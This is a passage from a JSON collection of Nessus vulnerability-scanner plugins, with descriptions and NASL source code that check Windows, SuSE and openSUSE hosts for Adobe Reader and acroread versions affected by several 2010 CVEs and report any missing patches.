script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.3\", reference:\"acroread-9.3.4-0.2.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"acroread\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T01:14:26", "description": "The version of Adobe Reader installed on the remote host is earlier\nthan 9.3.4 / 8.2.4. Such versions are reportedly affected by multiple\nvulnerabilities :\n \n - Multiple vulnerabilities in the bundled Flash\n Player as noted in APSB10-16. (CVE-2010-0209,\n CVE-2010-2188, CVE-2010-2213, CVE-2010-2214,\n CVE-2010-2215, CVE-2010-2216)\n\n - A social engineering attack could lead to code \n execution. (CVE-2010-1240)\n\n - An integer overflow vulnerability could lead to\n code execution. (CVE-2010-2862)", "edition": 26, "published": "2010-08-19T00:00:00", "title": "Adobe Reader < 9.3.4 / 8.2.4 Multiple Vulnerabilities (APSB10-17)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-2215", "CVE-2010-2188", "CVE-2010-2862", "CVE-2010-2216", "CVE-2010-0209", "CVE-2010-2213", "CVE-2010-1240", "CVE-2010-2214"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:adobe:acrobat_reader"], "id": "ADOBE_READER_APSB10-17.NASL", "href": "https://www.tenable.com/plugins/nessus/48375", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(48375);\n script_version(\"1.21\");\n script_cvs_date(\"Date: 2018/09/17 21:46:53\");\n\n script_xref(name:\"Secunia\", value:\"40766\");\n script_xref(name:\"Secunia\", value:\"40907\");\n\n script_name(english:\"Adobe Reader < 9.3.4 / 8.2.4 Multiple Vulnerabilities (APSB10-17)\");\n script_summary(english:\"Checks version of Adobe Reader\");\n\n script_cve_id(\n \"CVE-2010-0209\",\n \"CVE-2010-1240\",\n \"CVE-2010-2188\",\n \"CVE-2010-2213\",\n \"CVE-2010-2214\",\n \"CVE-2010-2215\",\n \"CVE-2010-2216\",\n \"CVE-2010-2862\"\n );\n script_bugtraq_id(\n 39109, \n 40798, \n 42203, \n 42358, \n 42361, \n 42362, \n 42363, \n 42364\n );\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Reader on the remote Windows host is affected by\nmultiple vulnerabilities.\");\n\n script_set_attribute(attribute:\"description\",value:\n\"The version of Adobe Reader installed on the remote host is earlier\nthan 9.3.4 / 8.2.4. Such versions are reportedly affected by multiple\nvulnerabilities :\n \n - Multiple vulnerabilities in the bundled Flash\n Player as noted in APSB10-16. (CVE-2010-0209,\n CVE-2010-2188, CVE-2010-2213, CVE-2010-2214,\n CVE-2010-2215, CVE-2010-2216)\n\n - A social engineering attack could lead to code \n execution. (CVE-2010-1240)\n\n - An integer overflow vulnerability could lead to\n code execution. (CVE-2010-2862)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://securityevaluators.com/knowledge/papers/CrashAnalysis.pdf\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.adobe.com/support/security/bulletins/apsb10-16.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.adobe.com/support/security/bulletins/apsb10-17.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Adobe Reader 9.3.4 / 8.2.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe PDF Escape EXE Social Engineering (No JavaScript)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/08/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/08/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/08/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat_reader\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:'Windows');\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies('adobe_reader_installed.nasl');\n script_require_keys('SMB/Acroread/Version');\n exit(0);\n}\n\n#\n\ninclude('global_settings.inc');\n\ninfo = '';\ninfo2 = '';\nvuln = 0;\nvers = get_kb_list('SMB/Acroread/Version');\nif (isnull(vers)) exit(0, 'The \"SMB/Acroread/Version\" KB list is missing.');\n\nforeach version (vers)\n{\n ver = split(version, sep:'.', keep:FALSE);\n for (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n path = get_kb_item('SMB/Acroread/'+version+'/Path');\n if (isnull(path)) path = 'n/a';\n\n verui = get_kb_item('SMB/Acroread/'+version+'/Version_UI');\n if (isnull(verui)) verui = version;\n\n if ( \n ver[0] < 8 ||\n (ver[0] == 8 && ver[1] < 2) ||\n (ver[0] == 8 && ver[1] == 2 && ver[2] < 4) ||\n (ver[0] == 9 && ver[1] < 3) ||\n (ver[0] == 9 && ver[1] == 3 && ver[2] < 4)\n )\n {\n vuln++;\n info += '\\n Path : '+path+\n '\\n Installed version : '+verui+\n '\\n Fixed version : 9.3.4 / 8.2.4\\n';\n }\n else\n info2 += \" and \" + verui;\n}\n\nif (info)\n{\n if (report_verbosity > 0)\n {\n if (vuln > 1) s = \"s of Adobe Reader are\";\n else s = \" of Adobe Reader is\";\n\n report =\n '\\nThe following vulnerable instance'+s+' installed on the'+\n '\\nremote host :\\n'+\n info;\n security_hole(port:get_kb_item(\"SMB/transport\"), extra:report);\n }\n else security_hole(get_kb_item(\"SMB/transport\"));\n\n exit(0);\n}\n\nif (info2) \n{\n info2 -= \" and \";\n if (\" and \" >< info2) be = \"are\";\n else be = \"is\";\n\n exit(0, \"The host is not affected since Adobe Reader \"+info2+\" \"+be+\" installed.\");\n}\nelse exit(1, \"Unexpected error - 'info2' is empty.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:43:07", "description": "Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code (CVE-2010-1240 / CVE-2010-2862). This has\nbeen fixed.\n\nThis update also incorporates the Adobe Flash Player update APSB10-16\nfor the bundled flash player parts. (CVE-2010-0209 / CVE-2010-2188 /\nCVE-2010-2213 / CVE-2010-2214 / CVE-2010-2215 / CVE-2010-2216)", "edition": 24, "published": "2011-01-27T00:00:00", "title": "SuSE 10 Security Update : acroread_ja (ZYPP Patch Number 7132)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-2215", "CVE-2010-2188", "CVE-2010-2862", "CVE-2010-2216", "CVE-2010-0209", "CVE-2010-2213", "CVE-2010-1240", "CVE-2010-2214"], "modified": "2011-01-27T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_ACROREAD_JA-7132.NASL", "href": "https://www.tenable.com/plugins/nessus/51714", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(51714);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-0209\", \"CVE-2010-1240\", \"CVE-2010-2188\", \"CVE-2010-2213\", \"CVE-2010-2214\", \"CVE-2010-2215\", \"CVE-2010-2216\", \"CVE-2010-2862\");\n\n script_name(english:\"SuSE 10 Security Update : acroread_ja (ZYPP Patch Number 7132)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code (CVE-2010-1240 / CVE-2010-2862). This has\nbeen fixed.\n\nThis update also incorporates the Adobe Flash Player update APSB10-16\nfor the bundled flash player parts. (CVE-2010-0209 / CVE-2010-2188 /\nCVE-2010-2213 / CVE-2010-2214 / CVE-2010-2215 / CVE-2010-2216)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0209.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1240.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2188.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2213.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2214.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2215.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2216.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2862.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 7132.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe PDF Escape EXE Social Engineering (No JavaScript)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/08/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/01/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"acroread_ja-9.3.4-0.4.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:42:58", "description": "Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code (CVE-2010-1240 / CVE-2010-2862). This has\nbeen fixed.\n\nThis update also incorporates the Adobe Flash Player update APSB10-16\nfor the bundled flash player parts. (CVE-2010-0209 / CVE-2010-2188 /\nCVE-2010-2213 / CVE-2010-2214 / CVE-2010-2215 / CVE-2010-2216)", "edition": 24, "published": "2011-01-27T00:00:00", "title": "SuSE 10 Security Update : Acrobat Reader (ZYPP Patch Number 7131)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-2215", "CVE-2010-2188", "CVE-2010-2862", "CVE-2010-2216", "CVE-2010-0209", "CVE-2010-2213", "CVE-2010-1240", "CVE-2010-2214"], "modified": "2011-01-27T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_ACROREAD-7131.NASL", "href": "https://www.tenable.com/plugins/nessus/51702", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(51702);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-0209\", \"CVE-2010-1240\", \"CVE-2010-2188\", \"CVE-2010-2213\", \"CVE-2010-2214\", \"CVE-2010-2215\", \"CVE-2010-2216\", \"CVE-2010-2862\");\n\n script_name(english:\"SuSE 10 Security Update : Acrobat Reader (ZYPP Patch Number 7131)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code (CVE-2010-1240 / CVE-2010-2862). This has\nbeen fixed.\n\nThis update also incorporates the Adobe Flash Player update APSB10-16\nfor the bundled flash player parts. (CVE-2010-0209 / CVE-2010-2188 /\nCVE-2010-2213 / CVE-2010-2214 / CVE-2010-2215 / CVE-2010-2216)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0209.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1240.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2188.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2213.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2214.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2215.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2216.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2862.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 7131.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe PDF Escape EXE Social Engineering (No JavaScript)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/08/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/01/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"acroread-9.3.4-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"acroread-cmaps-9.3.4-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"acroread-fonts-ja-9.3.4-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"acroread-fonts-ko-9.3.4-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"acroread-fonts-zh_CN-9.3.4-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"acroread-fonts-zh_TW-9.3.4-0.5.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:09:49", "description": "Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code (CVE-2010-1240 / CVE-2010-2862). This has\nbeen fixed.\n\nThis update also incorporates the Adobe Flash Player update APSB10-16\nfor the bundled flash player parts. (CVE-2010-0209 / CVE-2010-2188 /\nCVE-2010-2213 / CVE-2010-2214 / CVE-2010-2215 / CVE-2010-2216)", "edition": 24, "published": "2010-12-02T00:00:00", "title": "SuSE 11 / 11.1 Security Update : acroread_ja (SAT Patch Numbers 3004 / 3005)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-2215", "CVE-2010-2188", "CVE-2010-2862", "CVE-2010-2216", "CVE-2010-0209", "CVE-2010-2213", "CVE-2010-1240", "CVE-2010-2214"], "modified": "2010-12-02T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:acroread_ja", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_11_ACROREAD_JA-100825.NASL", "href": "https://www.tenable.com/plugins/nessus/50887", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(50887);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-0209\", \"CVE-2010-1240\", \"CVE-2010-2188\", \"CVE-2010-2213\", \"CVE-2010-2214\", \"CVE-2010-2215\", \"CVE-2010-2216\", \"CVE-2010-2862\");\n\n script_name(english:\"SuSE 11 / 11.1 Security Update : acroread_ja (SAT Patch Numbers 3004 / 3005)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code (CVE-2010-1240 / CVE-2010-2862). This has\nbeen fixed.\n\nThis update also incorporates the Adobe Flash Player update APSB10-16\nfor the bundled flash player parts. (CVE-2010-0209 / CVE-2010-2188 /\nCVE-2010-2213 / CVE-2010-2214 / CVE-2010-2215 / CVE-2010-2216)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=629134\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0209.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1240.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2188.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2213.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2214.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2215.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2216.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2862.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Apply SAT patch number 3004 / 3005 as appropriate.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe PDF Escape EXE Social Engineering (No JavaScript)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread_ja\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/08/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/12/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"acroread_ja-9.3.4-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"acroread_ja-9.3.4-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:05:34", "description": "Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code (CVE-2010-1240, CVE-2010-2862).\n\nThis update also incorporate the Adobe Flash Player update APSB10-16\nfor the bundled flash player parts (CVE-2010-0209, CVE-2010-2188,\nCVE-2010-2213, CVE-2010-2214, CVE-2010-2215, CVE-2010-2216).", "edition": 24, "published": "2010-09-02T00:00:00", "title": "openSUSE Security Update : acroread (openSUSE-SU-2010:0573-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-2215", "CVE-2010-2188", "CVE-2010-2862", "CVE-2010-2216", "CVE-2010-0209", "CVE-2010-2213", "CVE-2010-1240", "CVE-2010-2214"], "modified": "2010-09-02T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:acroread-fonts-ja", "p-cpe:/a:novell:opensuse:acroread-cmaps", "p-cpe:/a:novell:opensuse:acroread", "p-cpe:/a:novell:opensuse:acroread-fonts-ko", "cpe:/o:novell:opensuse:11.2", "p-cpe:/a:novell:opensuse:acroread-fonts-zh_CN", "p-cpe:/a:novell:opensuse:acroread-fonts-zh_TW"], "id": "SUSE_11_2_ACROREAD-100826.NASL", "href": "https://www.tenable.com/plugins/nessus/49084", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update acroread-3036.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(49084);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-0209\", \"CVE-2010-1240\", \"CVE-2010-2188\", \"CVE-2010-2213\", \"CVE-2010-2214\", \"CVE-2010-2215\", \"CVE-2010-2216\", \"CVE-2010-2862\");\n\n script_name(english:\"openSUSE Security Update : acroread (openSUSE-SU-2010:0573-1)\");\n script_summary(english:\"Check for the acroread-3036 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code (CVE-2010-1240, CVE-2010-2862).\n\nThis update also incorporate the Adobe Flash Player update APSB10-16\nfor the bundled flash player parts (CVE-2010-0209, CVE-2010-2188,\nCVE-2010-2213, CVE-2010-2214, CVE-2010-2215, CVE-2010-2216).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=629134\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2010-09/msg00000.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe PDF Escape EXE Social Engineering (No JavaScript)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-cmaps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-ja\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-ko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-zh_CN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-zh_TW\");\n script_set_attribute(attribute:\"cpe\", 